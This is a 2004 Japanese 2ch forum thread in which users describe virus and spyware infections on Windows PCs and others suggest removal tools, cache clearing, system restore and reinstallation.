そういう機能が付いたPCなのかもしれない
とりあえず取説読んでみたほうがいいかもね
298 :292:04/09/16 23:32:52
299 :名無しさん@お腹いっぱい。:04/09/17 01:16:52
すいません、質問させてください
さっきトレンドマイクロのオンラインスキャンしたところ
WORM_SDBOT.ORってのが発見されたんですけど、駆除できません。
このSDBOTの亜種だと思ってググってみても、ORというのは発見できませんでした。
駆除のための助言をいただけませんか?
さっきトレンドマイクロのオンラインスキャンしたところ
WORM_SDBOT.ORってのが発見されたんですけど、駆除できません。
このSDBOTの亜種だと思ってググってみても、ORというのは発見できませんでした。
駆除のための助言をいただけませんか?
遅レスすいません
いろいろ試してたものでレス遅れました
>>260
OS再インストールも考えてみます。。
>>268
レポートは白紙でした。。
NAVだけじゃ不安になったのでバスターのオンラインスキャンもやってみた結果
新たに「BAT_SASSER.A」「WORM_WOOTBOT.G」「REG.LOWZONES.A」というのにも
かかってしまっていたみたいでした
その後ベンダサイトでSASSER用駆除ツールをDL、実行等他の作業をしていて
全部消えたか確認のために再度オンラインスキャンを実行してみると
さっきまでは存在していなかった「TROJ_BOTIRC.A」というトロイが新たに発見されてしまい
そのトロイの解説には「侵入方法:メール送信やネットワーク越しの感染などはありません。
人間によるファイルの受け渡しによってのみ他のコンピュータに頒布されます。」
とあるのですが1回目のスキャンから2回目のスキャンの間までにDLしたのはSASSER用駆除ツールのみで
他に他人からファイルの受け取りなどはしていませんでした
そのほかにAPC.exe、net.exe、pp1.exe、soundm0n.exe、cmd.exeといったプロセスが
大量に立ち上がりパフォーマンスが著しく低下しだしてしまいます
APCなどは何度消しても復活してしまいます。。
どこからかバックグラウンド上で勝手にウィルスを収集するウィルス などは
あるのでしょうか?
いろいろ試してたものでレス遅れました
>>260
OS再インストールも考えてみます。。
>>268
レポートは白紙でした。。
NAVだけじゃ不安になったのでバスターのオンラインスキャンもやってみた結果
新たに「BAT_SASSER.A」「WORM_WOOTBOT.G」「REG.LOWZONES.A」というのにも
かかってしまっていたみたいでした
その後ベンダサイトでSASSER用駆除ツールをDL、実行等他の作業をしていて
全部消えたか確認のために再度オンラインスキャンを実行してみると
さっきまでは存在していなかった「TROJ_BOTIRC.A」というトロイが新たに発見されてしまい
そのトロイの解説には「侵入方法:メール送信やネットワーク越しの感染などはありません。
人間によるファイルの受け渡しによってのみ他のコンピュータに頒布されます。」
とあるのですが1回目のスキャンから2回目のスキャンの間までにDLしたのはSASSER用駆除ツールのみで
他に他人からファイルの受け取りなどはしていませんでした
そのほかにAPC.exe、net.exe、pp1.exe、soundm0n.exe、cmd.exeといったプロセスが
大量に立ち上がりパフォーマンスが著しく低下しだしてしまいます
APCなどは何度消しても復活してしまいます。。
どこからかバックグラウンド上で勝手にウィルスを収集するウィルス などは
あるのでしょうか?
301 :名無しさん@お腹いっぱい。:04/09/17 01:27:34
302 :名無しさん@お腹いっぱい。:04/09/17 01:43:21
>>300
よくあるのかどうかしらんが、俺も似たようなことがあった。
トロイAにウイルスBを感染させると、1回目のスキャンでは
ウイルスB検出駆除、2回目のスキャンでトロイA検出隔離
ってな感じ。
でもトロイだと何らかの形で実行してもらわんとなー。なんで
そんな怪しげなプロセスが発生するのかワカラン
よくあるのかどうかしらんが、俺も似たようなことがあった。
トロイAにウイルスBを感染させると、1回目のスキャンでは
ウイルスB検出駆除、2回目のスキャンでトロイA検出隔離
ってな感じ。
でもトロイだと何らかの形で実行してもらわんとなー。なんで
そんな怪しげなプロセスが発生するのかワカラン
303 :名無しさん@お腹いっぱい。:04/09/17 04:31:42
>>300
ありえる。というかもしかしたらウィルスじゃなくスパイウェアかもね。
Ad-awareはやっているみたいだが、これはAd-awareSEの最新の定義でやってるか?
Spybotは入れてみてやってみたか?
ファイヤーウォールソフトは入れているか?
(バックグラウンドで勝手に収集するウィルスなら、ファイヤーウォールで
「ネットに接続しようとしていますが・・・」と出るはず)
常駐のアンチウィルスソフトは最新の定義のNAV2004が入っているんでしょ?
ありえる。というかもしかしたらウィルスじゃなくスパイウェアかもね。
Ad-awareはやっているみたいだが、これはAd-awareSEの最新の定義でやってるか?
Spybotは入れてみてやってみたか?
ファイヤーウォールソフトは入れているか?
(バックグラウンドで勝手に収集するウィルスなら、ファイヤーウォールで
「ネットに接続しようとしていますが・・・」と出るはず)
常駐のアンチウィルスソフトは最新の定義のNAV2004が入っているんでしょ?
304 :名無しさん@お腹いっぱい。:04/09/17 06:59:41
>>300
スパイウェアの親玉がいる、たぶん
ここのテンプレ実行、スレ移動したほうがいいかも
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/
スパイウェアの親玉がいる、たぶん
ここのテンプレ実行、スレ移動したほうがいいかも
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/
305 :名無しさん@お腹いっぱい。:04/09/17 13:07:14
>>287
節しろや ( ゚∀゚)σ)´Д`)
節しろや ( ゚∀゚)σ)´Д`)
306 :名無しさん@お腹いっぱい。:04/09/17 18:38:03
皆さん助けてください!
インターネットを開いたらいつもはyahooのはずが、変なサイトがいっぱい出てきて直りません!
インターネットオプションから直そうとしても灰色になっててクリックできません!
どうしたらいいんでしょうか!? どうか教えてくださいお願いします!
インターネットを開いたらいつもはyahooのはずが、変なサイトがいっぱい出てきて直りません!
インターネットオプションから直そうとしても灰色になっててクリックできません!
どうしたらいいんでしょうか!? どうか教えてくださいお願いします!
307 :マンド゙クセ コピペ:04/09/17 18:54:22
>>306
コッチの方が情報あり
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。
コッチの方が情報あり
エロサイト見たら・・・助けて下さい!Part40
http://pc6.2ch.net/test/read.cgi/pcqa/1094644028/l50
まず、テンプレよ〜く嫁。読んで、実行して、それでもわからない場合に質問汁。
308 :名無しさん@お腹いっぱい。:04/09/17 20:55:00
最低でもOSがセーフモードで動かないと、ウィルスソフト買っても意味ないでしょうか?
それと、ファイアウォールの良し悪しというのはあるのですか?
あるとすれば、どこで判断するのですか?
それと、ファイアウォールの良し悪しというのはあるのですか?
あるとすれば、どこで判断するのですか?
>>303
Ad-aware、NAVともに最新の物になっています
Spybotも試した結果CnsMin等が引っかかりましたがそちらは駆除できたみたいです
FWはWinの純正?のものはかけてあるとおもいます
>>308
ではそちらのスレでお世話になってきます
レス下さった方々ありがとうございました
Ad-aware、NAVともに最新の物になっています
Spybotも試した結果CnsMin等が引っかかりましたがそちらは駆除できたみたいです
FWはWinの純正?のものはかけてあるとおもいます
>>308
ではそちらのスレでお世話になってきます
レス下さった方々ありがとうございました
310 :名無しさん@お腹いっぱい。:04/09/18 02:48:48
311 :名無しさん@お腹いっぱい。:04/09/18 04:51:26
質問です。
某サイトを知り合いが踏んでPCがおかしくなったらしいので
自分がチェックしたところ
MHTMLRedir.Exploit
Trojan.horse
Download.trojan
Download.ject
Trojan.ByteVerify
が検出されました。知り合いいわく
「画面が青くなり、〜〜%と表示される(自分もここまではなりました)
そしてPCを立ち上げると、デスクトップに変なショートカットが出来てて、デスクトップまでたどり着いた瞬間に
特定のプログラムを実行したと思ったらフリーズしてしまう」らしいんです。IEのブラウザを大量に開いてるのかも
と自分は思ったのですが。
でシマンテックで調べると、
Trojan.ByteVerify
これの症状が発生してるのかなと思ったのですが、この場合どう対処すれば
いいでしょうか?OSはMEです。
某サイトを知り合いが踏んでPCがおかしくなったらしいので
自分がチェックしたところ
MHTMLRedir.Exploit
Trojan.horse
Download.trojan
Download.ject
Trojan.ByteVerify
が検出されました。知り合いいわく
「画面が青くなり、〜〜%と表示される(自分もここまではなりました)
そしてPCを立ち上げると、デスクトップに変なショートカットが出来てて、デスクトップまでたどり着いた瞬間に
特定のプログラムを実行したと思ったらフリーズしてしまう」らしいんです。IEのブラウザを大量に開いてるのかも
と自分は思ったのですが。
でシマンテックで調べると、
Trojan.ByteVerify
これの症状が発生してるのかなと思ったのですが、この場合どう対処すれば
いいでしょうか?OSはMEです。
312 :名無しさん@お腹いっぱい。:04/09/18 05:45:41
質問させてください。office製品を開こうとするとインストーラーの準備を開始してしまいます。
昨日まで使えたワードやエクセルが使えません。シマンテックでウィルス感染を見つけ削除はしました。
そんなウィルスあるのでしょうか?調べたけどなさそうなんですが。
昨日まで使えたワードやエクセルが使えません。シマンテックでウィルス感染を見つけ削除はしました。
そんなウィルスあるのでしょうか?調べたけどなさそうなんですが。
313 :名無しさん@お腹いっぱい。:04/09/18 06:53:51
Norton AntiVirusは最新版です。WinXPSP2。
>>311さんの例と同じくリンクを踏んで
警告が出て遮断できたかと思ったのですがチェックしてみると
Trojan.horse
Trojan.ByteVerify
Bloodhound.Exploit.6
が検出されました。
システムの復元を無効にしてから、検疫項目の削除をしたのですが、
http://www.symantec.com/region/jp/sarcj/vinfodb.html#threat_list
ここで名前を探してみましたが、レジストリについて触れられていないモノは
レジストリをいじる必要はないのでしょうか?
削除できているか不安なのでまだ再起動はしていません。
どなたか教えて頂けると助かります。
>>311さんの例と同じくリンクを踏んで
警告が出て遮断できたかと思ったのですがチェックしてみると
Trojan.horse
Trojan.ByteVerify
Bloodhound.Exploit.6
が検出されました。
システムの復元を無効にしてから、検疫項目の削除をしたのですが、
http://www.symantec.com/region/jp/sarcj/vinfodb.html#threat_list
ここで名前を探してみましたが、レジストリについて触れられていないモノは
レジストリをいじる必要はないのでしょうか?
削除できているか不安なのでまだ再起動はしていません。
どなたか教えて頂けると助かります。
314 :名無しさん@お腹いっぱい。:04/09/18 07:38:21
>>311 >>313
どうせ両方とも常駐するアンチウィルスソフト入れてないんだろ?
これを機に入れておけ、でファイナルアンサー。無料のもあるんだから調べてみろ。
>>312
OfficeUpdateの関連じゃねーの。CDがあれば問題はないはず
割れユーザーなら残念でした
どうせ両方とも常駐するアンチウィルスソフト入れてないんだろ?
これを機に入れておけ、でファイナルアンサー。無料のもあるんだから調べてみろ。
>>312
OfficeUpdateの関連じゃねーの。CDがあれば問題はないはず
割れユーザーなら残念でした
315 :名無しさん@お腹いっぱい。:04/09/18 08:26:47
アンチウィルスソフトというのはNorton Internet Securityとは
全く別物なんですか?
今までそれがあるから大丈夫だと思っていたのですが。。
全く別物なんですか?
今までそれがあるから大丈夫だと思っていたのですが。。
316 :名無しさん@お腹いっぱい。:04/09/18 09:16:59
>>315
Norton Internet Securityはアンチウイルスソフトだよ。
ただし過信は禁物。
レジストリは記述が無いなら大丈夫だと思うが、念の為再スキャンしとけ。
それとWindowsUpdateはきちんとやっとけよ。
Norton Internet Securityはアンチウイルスソフトだよ。
ただし過信は禁物。
レジストリは記述が無いなら大丈夫だと思うが、念の為再スキャンしとけ。
それとWindowsUpdateはきちんとやっとけよ。
317 :名無しさん@お腹いっぱい。:04/09/18 09:19:28
319 :名無しさん@お腹いっぱい。:04/09/18 13:52:20
http://visualtracking.symantec.com/vt_main.asp?productid=nis2004&langid=jp&venid=sym&go=210.148.115.140
最近よくここからウィルスが来るんですがどうしたら良いんですか…。
最近よくここからウィルスが来るんですがどうしたら良いんですか…。
320 :名無しさん@お腹いっぱい。:04/09/18 17:21:48
すいません ウイルスが感染して悩んでします 治し方を教えてください
xpで起動してログインすると
ノートン:ウイルス警告 Back。Aent。Bに感染
RUNDLL:指定されたモジュールが見つかりません
Online Windows Spy Test:
Warning!
Welcome The System Perfoemance Wizart:
サーバーが見つかりません:20個開きます
Already running!!!
システマックの駆除ツール
CWShredder
a2
Spybot
HijackThis
はすべて試してみましたが 駆除できません
どうすればいいのでしょう?
xpで起動してログインすると
ノートン:ウイルス警告 Back。Aent。Bに感染
RUNDLL:指定されたモジュールが見つかりません
Online Windows Spy Test:
Warning!
Welcome The System Perfoemance Wizart:
サーバーが見つかりません:20個開きます
Already running!!!
システマックの駆除ツール
CWShredder
a2
Spybot
HijackThis
はすべて試してみましたが 駆除できません
どうすればいいのでしょう?
321 :名無しさん@お腹いっぱい。:04/09/18 18:26:29
再インスコ
すいません 再インストールってやってことがないのですが 初心者でも簡単なんでしょうか
パソコンはドスパラで買って一応組み立てアニュアルという冊子は付いてますが いまいち 自信がありません
323 :名無しさん@お腹いっぱい。:04/09/18 19:02:02
ヒタチのプリウスを使っていますが、立ち上げたあと黒い画面の上の方に白いハイフンが点滅したまま次の画面になりません。ウイルスでしょうか。またどうしたら治りますでしょうか。よろしくおねがいします。
324 :名無しさん@お腹いっぱい。:04/09/18 19:17:20
325 :名無しさん@お腹いっぱい。:04/09/18 19:35:32
マイクロオンラインスキャンで TROJ_ISTBAR.Wというウィルスが見つかったので、
ファイルを削除してスキャンしてみた所、
何度検索してもDownload programfile
CONFLICT.1¥STactiveX.dllと
ISTactivex.dllというファイルが検出されます。
フォルダ内を見ても、この2つのファイルは見つかりません。
どうすれば、削除できるのでしょうか?
どなたかご回答よろしくお願い致します。
ファイルを削除してスキャンしてみた所、
何度検索してもDownload programfile
CONFLICT.1¥STactiveX.dllと
ISTactivex.dllというファイルが検出されます。
フォルダ内を見ても、この2つのファイルは見つかりません。
どうすれば、削除できるのでしょうか?
どなたかご回答よろしくお願い致します。
326 :名無しさん@お腹いっぱい。:04/09/18 19:38:13
マカフィーの体験版を使用してるのですが、「ウィルススキャン」をインストールしてから
「パーソナルファイアウォールプラス」をインストールすると、途中で停止するのですが
どうすればよいでしょうか?
インストール中”application ・・・”というところで停止してしまいます。
よろしくお願いいたします。
「パーソナルファイアウォールプラス」をインストールすると、途中で停止するのですが
どうすればよいでしょうか?
インストール中”application ・・・”というところで停止してしまいます。
よろしくお願いいたします。
327 :名無しさん@お腹いっぱい。:04/09/18 20:15:03
すいません CDROMで再インストールしてみましたが 感染状態は変わりませんでした
やはり ハードディスクの初期化をしなければいけないのでしょうか
一応 グーグルで検索してみたのですが 使っているハードディスクの初期化のやり方がわかりません
どなたか教えてください
やはり ハードディスクの初期化をしなければいけないのでしょうか
一応 グーグルで検索してみたのですが 使っているハードディスクの初期化のやり方がわかりません
どなたか教えてください
329 :ぼる ◆yBEncckFOU :04/09/18 21:06:29
>>325
http://pc5.2ch.net/test/read.cgi/sec/1087290865/295
http://pc5.2ch.net/test/read.cgi/sec/1087290865/299
http://pc5.2ch.net/test/read.cgi/sec/1087290865/295
http://pc5.2ch.net/test/read.cgi/sec/1087290865/299
330 :名無しさん@お腹いっぱい。:04/09/18 21:10:31
>>328
駆除ツール使ったって書いてあるけど、指示どおりに使った?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.removal.tool.html
それから、こっちのデータベースの手動駆除方法は試してみた?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.html
初期化だのは最終的な手段だよ、まずは普通に駆除するのをちゃんと試してみろ
駆除ツール使ったって書いてあるけど、指示どおりに使った?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.removal.tool.html
それから、こっちのデータベースの手動駆除方法は試してみた?
http://www.symantec.com/region/jp/avcenter/venc/data/jp-backdoor.agent.b.html
初期化だのは最終的な手段だよ、まずは普通に駆除するのをちゃんと試してみろ
駆除ツールをやってみても not been found と出ました
手動法もセーブモード 一応やってみましたが やはり かわりなしです
DB化されたリストも スキャンログからコピー&ペーストで 一個一個検索して 怪しいものは消していきましたが
それも かわりなしです
手動法もセーブモード 一応やってみましたが やはり かわりなしです
DB化されたリストも スキャンログからコピー&ペーストで 一個一個検索して 怪しいものは消していきましたが
それも かわりなしです
332 :名無しさん@お腹いっぱい。:04/09/18 21:36:46
>>331
ウィルスに感染しているファイルを手動駆除できないのかどうか?
手動駆除方法でレジストリに残っているものはないかどうか?
再度最新の定義のノートンで全てのファイルをスキャンしてみて、
ウィルスは見つかるかどうか?
Ad-awareSEは試してみたかどうか?
ウィルスに感染しているファイルを手動駆除できないのかどうか?
手動駆除方法でレジストリに残っているものはないかどうか?
再度最新の定義のノートンで全てのファイルをスキャンしてみて、
ウィルスは見つかるかどうか?
Ad-awareSEは試してみたかどうか?
333 :名無しさん@お腹いっぱい。:04/09/18 21:43:31
感染したかわからないのですが、質問です。
脳豚先生がupdateできなくなりました。
spybot / adawareも同様に新しい定義ファイルが落とせません。
ですがetrustだけはこれまで同様にupdateできています。
有名なソフトのupdateが阻害されているということで、
これはウイルスに感染したか?と思い、
etrustとオンラインでスキャンをかけたのですが、
検出されたのは2chのログにあるloverletterくらい。
hostsも見てみましたが、特に妙な記述はありませんでした。
スタートアップにも怪しい記述はありませんし
(強いて言えばphimeって2つあったっけ?
desktopってcommon userと無名だった?というくらいです)
抽象的で申し訳ありませんが、
他にどこかチェックする場所等ありましたら教えてください。
脳豚先生がupdateできなくなりました。
spybot / adawareも同様に新しい定義ファイルが落とせません。
ですがetrustだけはこれまで同様にupdateできています。
有名なソフトのupdateが阻害されているということで、
これはウイルスに感染したか?と思い、
etrustとオンラインでスキャンをかけたのですが、
検出されたのは2chのログにあるloverletterくらい。
hostsも見てみましたが、特に妙な記述はありませんでした。
スタートアップにも怪しい記述はありませんし
(強いて言えばphimeって2つあったっけ?
desktopってcommon userと無名だった?というくらいです)
抽象的で申し訳ありませんが、
他にどこかチェックする場所等ありましたら教えてください。
334 :名無しさん@お腹いっぱい。:04/09/18 21:46:14
デスクトップに勝手にエロサイトのショートカットができるのですが、
Spybotや怪しいレジストリを削除しても駆除できません。
どのキーワードで検索したらいいですか?
Spybotや怪しいレジストリを削除しても駆除できません。
どのキーワードで検索したらいいですか?
335 :ぼる ◆yBEncckFOU :04/09/18 21:49:18
ぼるさんありがとうございました!
全てのファイルを表示にしても見えなかったので…
コマプロで削除する事が出来ました。
既に同じ質問があったのですね…
お手数お掛けいたしました。
全てのファイルを表示にしても見えなかったので…
コマプロで削除する事が出来ました。
既に同じ質問があったのですね…
お手数お掛けいたしました。
337 :名無しさん@お腹いっぱい。:04/09/19 05:45:14
赤い血みたいのがわらわら出てくるんですけど
なんでつか??こわい、、、
なんでつか??こわい、、、
338 :名無しさん@お腹いっぱい。:04/09/19 06:41:18
>>333
ノートン先生と、eTrustと、両方入っているから競合してるだけだと思う
ノートン先生がちゃんと最新の定義にできるならノートン先生だけにしろ
そうじゃないならeTrustだけにしろ
常駐するアンチウィルスソフトは2つ入れちゃダメ!
ノートン先生と、eTrustと、両方入っているから競合してるだけだと思う
ノートン先生がちゃんと最新の定義にできるならノートン先生だけにしろ
そうじゃないならeTrustだけにしろ
常駐するアンチウィルスソフトは2つ入れちゃダメ!
339 :名無しさん@お腹いっぱい。:04/09/19 10:22:23
ウィルス対策に全く無頓着だったド素人です。
ようやく何かソフトを買おうと思うようになったのですが、どれが
いいのかわかりません。
<ソースネクスト> ウイルスセキュリティ 2005
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980
<トレンドマイクロ> ウイルスバスター 2004 インターネットセキュリティ
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980
例えばこの2つ。機能は大体一緒だと思うのですが、何が決定的に異なるのでしょうか?
ウイルスセキュリティ2005でも最低限のものとしては十分ですか?
ようやく何かソフトを買おうと思うようになったのですが、どれが
いいのかわかりません。
<ソースネクスト> ウイルスセキュリティ 2005
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980
<トレンドマイクロ> ウイルスバスター 2004 インターネットセキュリティ
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980
例えばこの2つ。機能は大体一緒だと思うのですが、何が決定的に異なるのでしょうか?
ウイルスセキュリティ2005でも最低限のものとしては十分ですか?
340 :名無しさん@お腹いっぱい。:04/09/19 10:49:41
ウイルスに感染した場合、そのパソコンのHDDを他のパソコンに繋いで
感染したHDDをスキャンして、元のパソコンに戻せば大丈夫ですか?
感染したHDDをスキャンして、元のパソコンに戻せば大丈夫ですか?
341 :名無しさん@お腹いっぱい。:04/09/19 11:52:23
342 :名無しさん@お腹いっぱい。:04/09/19 12:17:36
343 :名無しさん@お腹いっぱい。:04/09/19 12:38:30
PC上のmp3、ipg、zip、wmaなどのファイルふぁ全て同じ容量になって破損していたのですがこれはウィルスでしょうか?
それともPCが壊れてるだけ?
それともPCが壊れてるだけ?
344 :名無しさん@お腹いっぱい。:04/09/19 13:07:37
当方、XP使用しておりますが、
backdoor Agentが毎回検出されるのと、windowsのundateをしようとすると
Active-Xがどうのこうのとかいうメッセージが出てきて一向にundateできません
どうしたらよいのでしょうか
backdoor Agentが毎回検出されるのと、windowsのundateをしようとすると
Active-Xがどうのこうのとかいうメッセージが出てきて一向にundateできません
どうしたらよいのでしょうか
345 :名無しさん@お腹いっぱい。:04/09/19 13:32:29
346 :名無しさん@お腹いっぱい。:04/09/19 16:13:41
>>343
nyやめて、ネットから引退してください
nyやめて、ネットから引退してください
347 :名無しさん@お腹いっぱい。:04/09/19 16:14:27
>>344
マルチ
マルチ
348 :名無しさん@お腹いっぱい。:04/09/19 16:57:24
ノートン先生が検出し、削除できなかったSpyware.Iwantserchを
手動削除しようとしましたがコマンドプロンプロからも見つかりません。
再スキャンをかけると同じ感染ファイルがまた検出されます。
対策知っている方いたらお願いします。
(ノートン先生はライブアップデート済み)
手動削除しようとしましたがコマンドプロンプロからも見つかりません。
再スキャンをかけると同じ感染ファイルがまた検出されます。
対策知っている方いたらお願いします。
(ノートン先生はライブアップデート済み)
349 :名無しさん@お腹いっぱい。:04/09/19 17:16:53
350 :名無しさん@お腹いっぱい。:04/09/19 17:17:29
>348
そんなあなたに>85-86
そんなあなたに>85-86
351 :348:04/09/19 17:38:03
【使用OS、WindowsUpdateの有無】XP(SP2)、有
【使用AntiVirus、Updateの有無】Norton AntiVirus、有
【スキャンした結果】
ウィルス名:Spyware.Iwantserch
結果・場所:圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari
Local Settings\Temporary Internet Files\Content.IE5\650VILYH\rundlg32[1].cab
は スパイウェア 脅威です。
圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari\Local Settings\Temporary Internet Files\Content.IE5\WXSN4RS7\rundlg32[1].cab
は スパイウェア 脅威です。…とノートン先生談。
【症状】今のところなし。サイト閲覧中に感染?
【とった措置】ノートン先生・スパイボットスキャン→手動削除(コマンドプロンプト)
よろしくお願いします。
>349
Spybot試しましましたが、駆除できませんでした。
【使用AntiVirus、Updateの有無】Norton AntiVirus、有
【スキャンした結果】
ウィルス名:Spyware.Iwantserch
結果・場所:圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari
Local Settings\Temporary Internet Files\Content.IE5\650VILYH\rundlg32[1].cab
は スパイウェア 脅威です。
圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari\Local Settings\Temporary Internet Files\Content.IE5\WXSN4RS7\rundlg32[1].cab
は スパイウェア 脅威です。…とノートン先生談。
【症状】今のところなし。サイト閲覧中に感染?
【とった措置】ノートン先生・スパイボットスキャン→手動削除(コマンドプロンプト)
よろしくお願いします。
>349
Spybot試しましましたが、駆除できませんでした。
352 :ぼる ◆yBEncckFOU :04/09/19 17:57:52
>>351
IEのキャッシュ削除すればいいんでないNO?
ツール→インターネットオプション→全般
→インターネット一時ファイル→ファイルの削除
→「すべてのオフラインコンテンツを削除する」にチェックしてOK
でノートンで再スキャン
IEのキャッシュ削除すればいいんでないNO?
ツール→インターネットオプション→全般
→インターネット一時ファイル→ファイルの削除
→「すべてのオフラインコンテンツを削除する」にチェックしてOK
でノートンで再スキャン
353 :339:04/09/19 18:06:09
みなさま、ありがとうございます。ソースネクストはやめときますね・・・
354 :名無しさん@お腹いっぱい。:04/09/19 19:47:06
>352
試してみましたが、ダメでした…
が、システム復元後、再スキャンしたら消えていました
レスありがとうございました!
試してみましたが、ダメでした…
が、システム復元後、再スキャンしたら消えていました
レスありがとうございました!
355 :名無しさん@お腹いっぱい。:04/09/19 21:54:11
W32.Yahaの症状が出ていますが、見つからず駆除できません。
これで合っているのか、それとも違うものなのか教えてください。
【使用OS】WinXP Personal SP1
【WindowsUpdateしてるか】たまにナローな環境で使用しているので、その時はしていませんが、BBの時は行っています。
【AntiVirusは何を使っているか】McAfee VirusScan 疑惑後に入れた体験版ウィルスキラー
【ちゃんとUpdateしてるか】WindowsUpdateと同様BBな時のみ。
【スキャンした結果(ウイルス名・発見場所)】発見されず。
【症状を具体的に、分かる限りすべて書く】起動時に「vsynmgr.exe はエラーが発生し閉じられる必要がありました。」と必ず出る。
データ送信量が多い気がする。受信より少し多い程度。何もしていないときは増える事はない。
マカフィーを起動し閉じると「scan32.exeが閉じる」とメッセージが出る。
【何をしたらそんなことになったのか】プリンタのドライバをインストールした。外付けROMで入れたのだが、
インスコ後、安全な取り外しを実行せずにPCカードを引っこ抜いた。それとネット。
【これまでにとった措置】オンラインスキャン(マカフィー、シマンテック、トレンドマイクロ3箇所全て)が発見できず。
自分のPCに最初から入っていたマカフィーもしたが、期限が切れてるかも。PC購入は2001年秋。
バージョンは2004年9月14日になってる。駆除ソフトをDLし実行→ウィルス存在せずで終了
これで合っているのか、それとも違うものなのか教えてください。
【使用OS】WinXP Personal SP1
【WindowsUpdateしてるか】たまにナローな環境で使用しているので、その時はしていませんが、BBの時は行っています。
【AntiVirusは何を使っているか】McAfee VirusScan 疑惑後に入れた体験版ウィルスキラー
【ちゃんとUpdateしてるか】WindowsUpdateと同様BBな時のみ。
【スキャンした結果(ウイルス名・発見場所)】発見されず。
【症状を具体的に、分かる限りすべて書く】起動時に「vsynmgr.exe はエラーが発生し閉じられる必要がありました。」と必ず出る。
データ送信量が多い気がする。受信より少し多い程度。何もしていないときは増える事はない。
マカフィーを起動し閉じると「scan32.exeが閉じる」とメッセージが出る。
【何をしたらそんなことになったのか】プリンタのドライバをインストールした。外付けROMで入れたのだが、
インスコ後、安全な取り外しを実行せずにPCカードを引っこ抜いた。それとネット。
【これまでにとった措置】オンラインスキャン(マカフィー、シマンテック、トレンドマイクロ3箇所全て)が発見できず。
自分のPCに最初から入っていたマカフィーもしたが、期限が切れてるかも。PC購入は2001年秋。
バージョンは2004年9月14日になってる。駆除ソフトをDLし実行→ウィルス存在せずで終了
356 :名無しさん@お腹いっぱい。:04/09/19 22:23:52
>>355
アンチウイルスソフトが競合してscan32.exe(マカフィー)vsynmgr.exe(ウイルスキラー?)
の起動がうまくいってないんでないの?
どっちか片方アンスコして再起動してみてちょ
アンチウイルスソフトが競合してscan32.exe(マカフィー)vsynmgr.exe(ウイルスキラー?)
の起動がうまくいってないんでないの?
どっちか片方アンスコして再起動してみてちょ
357 :名無しさん@お腹いっぱい。:04/09/19 22:41:24
なんか変なURL踏んじゃって、変なツールバー出るし何回やってもホームのページが
固定されてるし…。助けてください!お願いします。
固定されてるし…。助けてください!お願いします。
358 :名無しさん@お腹いっぱい。:04/09/19 22:44:33
釣られないクマ・・・
359 :名無しさん@お腹いっぱい。:04/09/19 23:35:25
初心者はとりあえずパンダオンラインスキャンでもやっとけ
360 :名無しさん@お腹いっぱい。:04/09/20 00:05:51
質問なんですが
アドウェアが16個も発見され、削除しようとウィルス名からリンクされたページでの
「定義の更新→設定→コントロールパネル→追加と削除」を実行したんですが
追加と削除のファイル一覧にウィルスが表示されておらず削除が出来ません;
何か方法を間違っているのでしょうか
解決方法などあればよろしくお願いいたします
スレ違いでしたらすみません
アドウェアが16個も発見され、削除しようとウィルス名からリンクされたページでの
「定義の更新→設定→コントロールパネル→追加と削除」を実行したんですが
追加と削除のファイル一覧にウィルスが表示されておらず削除が出来ません;
何か方法を間違っているのでしょうか
解決方法などあればよろしくお願いいたします
スレ違いでしたらすみません
361 :名無しさん@お腹いっぱい。:04/09/20 02:22:16
パスワード付きの圧縮ファイルの中身も
ウイルススキャンできるんでしょうか?
ウイルススキャンできるんでしょうか?
362 :名無しさん@お腹いっぱい。:04/09/20 02:26:12
363 :名無しさん@お腹いっぱい。:04/09/20 12:10:22
364 :名無しさん@お腹いっぱい。:04/09/20 12:35:07
スルーすればいいよ。12時間も前田氏
365 :名無しさん@お腹いっぱい。:04/09/20 20:20:22
誘導されてきました。
お願いします。
XPで2ちゃん壺入れてます。
シマンテックのオンラインスキャンでかけたら
C:\Program Files\tora3\2chtubo\log\pc5.2ch.net\sec\**********.dat は
Unix.Penguin に感染しています。
と出ました。
これは入れてる壺のだと思うんですが
何か対策した方がいいのでしょうか?
**********の部分は数字です。
お願いします。
XPで2ちゃん壺入れてます。
シマンテックのオンラインスキャンでかけたら
C:\Program Files\tora3\2chtubo\log\pc5.2ch.net\sec\**********.dat は
Unix.Penguin に感染しています。
と出ました。
これは入れてる壺のだと思うんですが
何か対策した方がいいのでしょうか?
**********の部分は数字です。
366 :名無しさん@お腹いっぱい。:04/09/20 20:32:56
しなくていいんじゃない
367 :名無しさん@お腹いっぱい。:04/09/20 20:38:21
win2kのsystem32にCmdLineExt03.dllってのが勝手にインスコされてたんだが
これってウイルス?
これってウイルス?
368 :名無しさん@お腹いっぱい。:04/09/20 20:55:08
>365
今回の件は気にしなくてもいいが
ウイルス気にするならアンチウイルスソフト入れれ
今回の件は気にしなくてもいいが
ウイルス気にするならアンチウイルスソフト入れれ
369 :名無しさん@お腹いっぱい。:04/09/20 20:57:23
>>365
誘導じゃなくて、ここのテンプレに答えが載っているんだが。
誘導じゃなくて、ここのテンプレに答えが載っているんだが。
370 :名無しさん@お腹いっぱい。:04/09/20 21:05:45
